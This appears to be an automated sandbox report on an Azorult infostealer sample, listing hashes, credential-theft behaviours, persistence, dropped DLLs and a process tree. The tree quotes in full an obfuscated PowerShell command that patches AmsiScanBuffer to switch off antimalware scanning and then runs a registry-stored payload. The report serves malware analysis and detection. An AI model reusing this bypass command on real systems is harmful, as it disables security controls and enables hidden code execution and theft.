Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04-06-2024 11:22

General

  • Target

    IMG_1005752333.exe

  • Size

    219KB

  • MD5

    8816d5e592685626fbbfdb1b1b309d79

  • SHA1

    650de5fc16a287c7801742ec92a2cc1ae7fcf4e8

  • SHA256

    d1832886bd31bf7129fbd708123c19bbc633e4c12bde2affabbf69236f38afad

  • SHA512

    323dcf2b6de01767912a05abb93f97c12667b450ad97274babdb8b58248b36c6578e249aec1066bb8afe9568fe450e54795458149d53b71204e312bb8c90bf7f

  • SSDEEP

    3072:8OJNjggfyKg0KggLV0FOhJirBwtHwwEJx5Ehl/Qs7GzrlKFHZWazC3ayZyn+q/wD:5H10CtAbe

Malware Config

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 4 IoCs
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in System32 directory 14 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:612
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:376
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{d98d7404-1429-4bfd-a5c2-4f14d0acc630}
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4784
    • C:\Windows\system32\lsass.exe
      C:\Windows\system32\lsass.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:672
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
      1⤵
        PID:964
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
        1⤵
          PID:508
        • C:\Windows\System32\svchost.exe
          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
          1⤵
            PID:932
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
            1⤵
              PID:1088
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
              1⤵
                PID:1100
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                1⤵
                  PID:1148
                  • C:\Windows\system32\taskhostw.exe
                    taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                    2⤵
                      PID:2776
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:ErDpaczYljFy{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$afqUlgNWzYGgEx,[Parameter(Position=1)][Type]$ExStVbmAlB)$FAqyHlpbQWU=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+'l'+''+'e'+''+[Char](99)+''+'t'+'e'+[Char](100)+'D'+[Char](101)+'l'+[Char](101)+'g'+'a'+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+'M'+'e'+[Char](109)+''+'o'+''+[Char](114)+'yM'+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+'D'+''+[Char](101)+''+[Char](108)+''+[Char](101)+'g'+'a'+''+'t'+''+[Char](101)+''+[Char](84)+''+'y'+''+'p'+''+[Char](101)+'',''+[Char](67)+''+'l'+''+[Char](97)+'s'+[Char](115)+''+','+''+'P'+'u'+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+','+[Char](83)+'e'+[Char](97)+''+'l'+''+[Char](101)+''+[Char](100)+''+','+''+[Char](65)+''+'n'+'s'+[Char](105)+'C'+'l'+''+[Char](97)+'s'+[Char](115)+''+[Char](44)+''+'A'+''+[Char](117)+'toCl'+[Char](97)+'ss',[MulticastDelegate]);$FAqyHlpbQWU.DefineConstructor('R'+'T'+''+[Char](83)+''+[Char](112)+''+[Char](101)+'c'+'i'+''+'a'+''+'l'+''+[Char](78)+''+'a'+''+[Char](109)+'e'+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$afqUlgNWzYGgEx).SetImplementationFlags(''+'R'+'un'+'t'+''+'i'+''+'m'+''+'e'+''+','+''+'M'+'a'+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');$FAqyHlpbQWU.DefineMethod(''+[Char](73)+''+[Char](110)+''+'v'+'oke',''+[Char](80)+''+'u'+''+[Char](98)+''+'l'+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+'B'+'y'+''+[Char](83)+''+[Char](105)+'g'+','+'N'+[Char](101)+''+[Char](119)+''+[Char](83)+''+'l'+''+'o'+''+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+'ua'+[Char](108)+'',$ExStVbmAlB,$afqUlgNWzYGgEx).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+''+[Char](116)+''+[Char](105)+'m'+[Char](101)+''+','+''+'M'+''+'a'+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $FAqyHlpbQWU.CreateType();}$eEgjOGjhAgZCH=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+'s'+''+[Char](116)+''+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+'ll')}).GetType(''+[Char](77)+''+[Char](105)+'c'+[Char](114)+'o'+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+'W'+'i'+''+[Char](110)+''+'3'+''+'2'+''+[Char](46)+''+[Char](85)+''+'n'+''+[Char](115)+''+'a'+''+'f'+''+'e'+''+[Char](78)+'a'+[Char](116)+'i'+[Char](118)+''+'e'+''+'M'+''+[Char](101)+''+[Char](116)+''+[Char](104)+'o'+'d'+'s');$TdyTiBgeUPZWKb=$eEgjOGjhAgZCH.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+'P'+'r'+[Char](111)+''+[Char](99)+''+[Char](65)+'d'+[Char](100)+''+[Char](114)+''+'e'+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+'t'+[Char](97)+''+[Char](116)+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$XIkWJZYLHtwtpGVBdUu=ErDpaczYljFy @([String])([IntPtr]);$ClEwueHjLVLtFzPyLhNbdv=ErDpaczYljFy @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$zMSQWnHWQOp=$eEgjOGjhAgZCH.GetMethod('G'+'e'+''+[Char](116)+''+'M'+''+'o'+''+[Char](100)+''+[Char](117)+'l'+[Char](101)+''+'H'+''+'a'+''+[Char](110)+''+[Char](100)+''+[Char](108)+'e').Invoke($Null,@([Object](''+'k'+''+'e'+''+[Char](114)+''+[Char](110)+'el'+[Char](51)+''+[Char](50)+'.'+[Char](100)+''+'l'+'l')));$yvZpjxhQhsFdwJ=$TdyTiBgeUPZWKb.Invoke($Null,@([Object]$zMSQWnHWQOp,[Object](''+[Char](76)+''+'o'+''+[Char](97)+''+'d'+'L'+[Char](105)+''+'b'+''+[Char](114)+'a'+[Char](114)+'y'+'A'+'')));$fgxqBHchFRXwUphTM=$TdyTiBgeUPZWKb.Invoke($Null,@([Object]$zMSQWnHWQOp,[Object](''+'V'+''+'i'+''+[Char](114)+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+''+'P'+''+[Char](114)+''+'o'+''+[Char](116)+''+[Char](101)+''+[Char](99)+'t')));$ajYnTEs=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($yvZpjxhQhsFdwJ,$XIkWJZYLHtwtpGVBdUu).Invoke(''+[Char](97)+''+[Char](109)+'s'+[Char](105)+'.'+'d'+'ll');$nOdSwRPBkericmLVa=$TdyTiBgeUPZWKb.Invoke($Null,@([Object]$ajYnTEs,[Object](''+'A'+''+[Char](109)+''+[Char](115)+'i'+'S'+''+[Char](99)+''+'a'+''+[Char](110)+'B'+'u'+''+'f'+'f'+'e'+''+[Char](114)+'')));$WKIirINODv=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($fgxqBHchFRXwUphTM,$ClEwueHjLVLtFzPyLhNbdv).Invoke($nOdSwRPBkericmLVa,[uint32]8,4,[ref]$WKIirINODv);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$nOdSwRPBkericmLVa,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($fgxqBHchFRXwUphTM,$ClEwueHjLVLtFzPyLhNbdv).Invoke($nOdSwRPBkericmLVa,[uint32]8,0x20,[ref]$WKIirINODv);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+[Char](87)+''+[Char](65)+''+'R'+''+[Char](69)+'').GetValue(''+[Char](36)+'7'+[Char](55)+'s'+'t'+'ag'+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"
                      2⤵
                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                      • Drops file in System32 directory
                      • Suspicious use of SetThreadContext
                      • Modifies data under HKEY_USERS
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:1036
                  • C:\Windows\System32\svchost.exe
                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                    1⤵
                    • Drops file in System32 directory
                    PID:1176
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                    1⤵
                      PID:1284
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                      1⤵
                        PID:1340
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                        1⤵
                          PID:1352
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                          1⤵
                            PID:1392
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                            1⤵
                              PID:1516
                              • C:\Windows\system32\sihost.exe
                                sihost.exe
                                2⤵
                                  PID:2616
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                1⤵
                                  PID:1540
                                • C:\Windows\System32\svchost.exe
                                  C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                  1⤵
                                    PID:1564
                                  • C:\Windows\System32\svchost.exe
                                    C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                    1⤵
                                      PID:1680
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                      1⤵
                                        PID:1696
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                        1⤵
                                          PID:1760
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                          1⤵
                                            PID:1788
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                            1⤵
                                              PID:1828
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                              1⤵
                                                PID:1944
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                1⤵
                                                  PID:1952
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                  1⤵
                                                    PID:1996
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                    1⤵
                                                      PID:1144
                                                    • C:\Windows\System32\spoolsv.exe
                                                      C:\Windows\System32\spoolsv.exe
                                                      1⤵
                                                        PID:2080
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                        1⤵
                                                          PID:2096
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                          1⤵
                                                            PID:2236
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                            1⤵
                                                              PID:2288
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                              1⤵
                                                                PID:2464
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                1⤵
                                                                  PID:2472
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                  1⤵
                                                                    PID:2632
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                    1⤵
                                                                      PID:2756
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                      1⤵
                                                                      • Drops file in System32 directory
                                                                      • Modifies data under HKEY_USERS
                                                                      PID:2768
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                      1⤵
                                                                        PID:2828
                                                                      • C:\Windows\sysmon.exe
                                                                        C:\Windows\sysmon.exe
                                                                        1⤵
                                                                          PID:2852
                                                                        • C:\Windows\System32\svchost.exe
                                                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                          1⤵
                                                                            PID:2880
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                            1⤵
                                                                              PID:2908
                                                                            • C:\Windows\system32\wbem\unsecapp.exe
                                                                              C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                              1⤵
                                                                                PID:3168
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                1⤵
                                                                                  PID:3420
                                                                                • C:\Windows\Explorer.EXE
                                                                                  C:\Windows\Explorer.EXE
                                                                                  1⤵
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:3516
                                                                                  • C:\Users\Admin\AppData\Local\Temp\IMG_1005752333.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\IMG_1005752333.exe"
                                                                                    2⤵
                                                                                    • Adds Run key to start application
                                                                                    • Suspicious use of SetThreadContext
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:5064
                                                                                    • C:\Users\Admin\AppData\Local\Temp\$77c6dd89
                                                                                      "C:\Users\Admin\AppData\Local\Temp\$77c6dd89"
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:820
                                                                                    • C:\Users\Admin\AppData\Local\Temp\$777e8b2c
                                                                                      "C:\Users\Admin\AppData\Local\Temp\$777e8b2c"
                                                                                      3⤵
                                                                                      • Checks computer location settings
                                                                                      • Executes dropped EXE
                                                                                      • Loads dropped DLL
                                                                                      • Accesses Microsoft Outlook profiles
                                                                                      • Checks processor information in registry
                                                                                      • outlook_office_path
                                                                                      • outlook_win_path
                                                                                      PID:752
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "$777e8b2c"
                                                                                        4⤵
                                                                                          PID:2300
                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            5⤵
                                                                                              PID:4308
                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                              C:\Windows\system32\timeout.exe 3
                                                                                              5⤵
                                                                                              • Delays execution with timeout.exe
                                                                                              PID:1048
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                      1⤵
                                                                                        PID:3660
                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                        C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                        1⤵
                                                                                          PID:3840
                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                          1⤵
                                                                                            PID:3988
                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                            1⤵
                                                                                              PID:3532
                                                                                            • C:\Windows\System32\RuntimeBroker.exe
                                                                                              C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                              1⤵
                                                                                                PID:4740
                                                                                              • C:\Windows\System32\svchost.exe
                                                                                                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                1⤵
                                                                                                  PID:3752
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                  1⤵
                                                                                                    PID:2440
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                    1⤵
                                                                                                    • Modifies data under HKEY_USERS
                                                                                                    PID:3228
                                                                                                  • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                    "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                    1⤵
                                                                                                    • Drops file in System32 directory
                                                                                                    • Modifies data under HKEY_USERS
                                                                                                    PID:452
                                                                                                  • C:\Windows\system32\SppExtComObj.exe
                                                                                                    C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                    1⤵
                                                                                                      PID:3952
                                                                                                    • C:\Windows\System32\svchost.exe
                                                                                                      C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                      1⤵
                                                                                                        PID:4008
                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                        1⤵
                                                                                                          PID:448
                                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                                          C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                          1⤵
                                                                                                            PID:1736
                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                            1⤵
                                                                                                              PID:4888
                                                                                                            • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                              C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                              1⤵
                                                                                                                PID:5060
                                                                                                              • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                1⤵
                                                                                                                  PID:1320
                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                                  1⤵
                                                                                                                    PID:2092
                                                                                                                  • C:\Windows\System32\mousocoreworker.exe
                                                                                                                    C:\Windows\System32\mousocoreworker.exe -Embedding
                                                                                                                    1⤵
                                                                                                                      PID:4584

                                                                                                                    Network

                                                                                                                    MITRE ATT&CK Enterprise v15

                                                                                                                    Replay Monitor

                                                                                                                    Loading Replay Monitor...

                                                                                                                    Downloads

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\$77c6dd89

                                                                                                                      Filesize

                                                                                                                      219KB

                                                                                                                      MD5

                                                                                                                      8816d5e592685626fbbfdb1b1b309d79

                                                                                                                      SHA1

                                                                                                                      650de5fc16a287c7801742ec92a2cc1ae7fcf4e8

                                                                                                                      SHA256

                                                                                                                      d1832886bd31bf7129fbd708123c19bbc633e4c12bde2affabbf69236f38afad

                                                                                                                      SHA512

                                                                                                                      323dcf2b6de01767912a05abb93f97c12667b450ad97274babdb8b58248b36c6578e249aec1066bb8afe9568fe450e54795458149d53b71204e312bb8c90bf7f

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1C8784A0\mozglue.dll

                                                                                                                      Filesize

                                                                                                                      135KB

                                                                                                                      MD5

                                                                                                                      9e682f1eb98a9d41468fc3e50f907635

                                                                                                                      SHA1

                                                                                                                      85e0ceca36f657ddf6547aa0744f0855a27527ee

                                                                                                                      SHA256

                                                                                                                      830533bb569594ec2f7c07896b90225006b90a9af108f49d6fb6bebd02428b2d

                                                                                                                      SHA512

                                                                                                                      230230722d61ac1089fabf3f2decfa04f9296498f8e2a2a49b1527797dca67b5a11ab8656f04087acadf873fa8976400d57c77c404eba4aff89d92b9986f32ed

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1C8784A0\msvcp140.dll

                                                                                                                      Filesize

                                                                                                                      429KB

                                                                                                                      MD5

                                                                                                                      109f0f02fd37c84bfc7508d4227d7ed5

                                                                                                                      SHA1

                                                                                                                      ef7420141bb15ac334d3964082361a460bfdb975

                                                                                                                      SHA256

                                                                                                                      334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4

                                                                                                                      SHA512

                                                                                                                      46eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1C8784A0\nss3.dll

                                                                                                                      Filesize

                                                                                                                      1.2MB

                                                                                                                      MD5

                                                                                                                      556ea09421a0f74d31c4c0a89a70dc23

                                                                                                                      SHA1

                                                                                                                      f739ba9b548ee64b13eb434a3130406d23f836e3

                                                                                                                      SHA256

                                                                                                                      f0e6210d4a0d48c7908d8d1c270449c91eb4523e312a61256833bfeaf699abfb

                                                                                                                      SHA512

                                                                                                                      2481fc80dffa8922569552c3c3ebaef8d0341b80427447a14b291ec39ea62ab9c05a75e85eef5ea7f857488cab1463c18586f9b076e2958c5a314e459045ede2

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1C8784A0\vcruntime140.dll

                                                                                                                      Filesize

                                                                                                                      81KB

                                                                                                                      MD5

                                                                                                                      7587bf9cb4147022cd5681b015183046

                                                                                                                      SHA1

                                                                                                                      f2106306a8f6f0da5afb7fc765cfa0757ad5a628

                                                                                                                      SHA256

                                                                                                                      c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d

                                                                                                                      SHA512

                                                                                                                      0b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f

                                                                                                                    • C:\Windows\Temp\__PSScriptPolicyTest_zthrux33.nzg.ps1

                                                                                                                      Filesize

                                                                                                                      60B

                                                                                                                      MD5

                                                                                                                      d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                      SHA1

                                                                                                                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                      SHA256

                                                                                                                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                      SHA512

                                                                                                                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                    • memory/820-4903-0x0000000000400000-0x000000000042B000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      172KB

                                                                                                                    • memory/1036-4920-0x0000017DFF4F0000-0x0000017DFF51A000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      168KB

                                                                                                                    • memory/1036-4918-0x00007FF9F8150000-0x00007FF9F8C11000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      10.8MB

                                                                                                                    • memory/1036-4917-0x0000017DFCFE0000-0x0000017DFD002000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      136KB

                                                                                                                    • memory/1036-4919-0x00007FF9F8150000-0x00007FF9F8C11000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      10.8MB

                                                                                                                    • memory/1036-4907-0x00007FF9F8150000-0x00007FF9F8C11000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      10.8MB

                                                                                                                    • memory/1036-4906-0x00007FF9F8150000-0x00007FF9F8C11000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      10.8MB

                                                                                                                    • memory/1036-4905-0x00007FF9F8153000-0x00007FF9F8155000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                    • memory/1036-4934-0x00007FF9F8150000-0x00007FF9F8C11000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      10.8MB

                                                                                                                    • memory/5064-31-0x0000000006DF0000-0x000000000703A000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      2.3MB

                                                                                                                    • memory/5064-7-0x0000000006DF0000-0x000000000703A000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      2.3MB

                                                                                                                    • memory/5064-63-0x0000000006DF0000-0x000000000703A000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      2.3MB

                                                                                                                    • memory/5064-61-0x0000000006DF0000-0x000000000703A000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      2.3MB

                                                                                                                    • memory/5064-59-0x0000000006DF0000-0x000000000703A000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      2.3MB

                                                                                                                    • memory/5064-57-0x0000000006DF0000-0x000000000703A000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      2.3MB

                                                                                                                    • memory/5064-55-0x0000000006DF0000-0x000000000703A000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      2.3MB

                                                                                                                    • memory/5064-53-0x0000000006DF0000-0x000000000703A000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      2.3MB

                                                                                                                    • memory/5064-49-0x0000000006DF0000-0x000000000703A000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      2.3MB

                                                                                                                    • memory/5064-47-0x0000000006DF0000-0x000000000703A000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      2.3MB

                                                                                                                    • memory/5064-45-0x0000000006DF0000-0x000000000703A000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      2.3MB

                                                                                                                    • memory/5064-43-0x0000000006DF0000-0x000000000703A000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      2.3MB

                                                                                                                    • memory/5064-39-0x0000000006DF0000-0x000000000703A000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      2.3MB

                                                                                                                    • memory/5064-37-0x0000000006DF0000-0x000000000703A000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      2.3MB

